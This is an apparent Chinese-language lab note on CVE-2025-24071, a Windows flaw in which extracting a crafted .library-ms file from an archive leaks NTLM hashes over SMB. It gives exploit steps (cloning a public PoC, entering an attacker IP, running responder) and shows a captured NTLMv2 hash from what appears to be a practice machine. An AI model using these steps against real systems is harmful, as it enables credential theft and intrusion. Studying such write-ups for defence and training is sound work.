CVE-2025-24071

created: "2025-11-13 23:03"
tags:
  - CVE-2025-24071
  - zip
  - phishing
aliases:
Type:
title:
updated: "2025-11-17 23:09"

当从 .rar 压缩包中提取 .library-ms 文件时，Windows 资源管理器会自动发起 SMB 身份验证请求，从而导致 NTLM 哈希值泄露。用户无需打开或执行该文件——只需提取它即可触发泄露。

1. 快速利用

GitHub - 0x6rss/CVE-2025-24071_PoC: CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File
CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File

git clone https://github.com/0x6rss/CVE-2025-24071_PoC

python poc.py
enter file name: your file name
enter IP: attacker IP

1.1. 案例

┌──(root㉿kali)-[~/…/season8/fluffy/CVE-2025-24071_PoC/CVE-2025-24071-msfvenom]
└─# sudo responder -I tun0 -v

# smb：上传expliot.zip

#触发漏洞
[SMB] NTLMv2-SSP Client : 10.10.11.69 [SMB] NTLMv2-SSP Username : FLUFFY\p.agila [SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:4612b85423aed083:73B5B454A248166FB43F809FA59ACDBA:010100000000000000796ABF52CDDB01D23C68CA6AC569020000000002000800550030003100330001001E00570049004E002D00560044005A003600300030005500460046003200590004003400570049004E002D00560044005A00360030003000550046004600320059002E0055003000310033002E004C004F00430041004C000300140055003000310033002E004C004F00430041004C000500140055003000310033002E004C004F00430041004C000700080000796ABF52CDDB01060004000200000008003000300000000000000001000000002000009850210C3B697422BCA38C6B2216E754DBFB52DA16AAC86C61528CEE298FC1640A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310035000000000000000000

Pasted image 20250525142315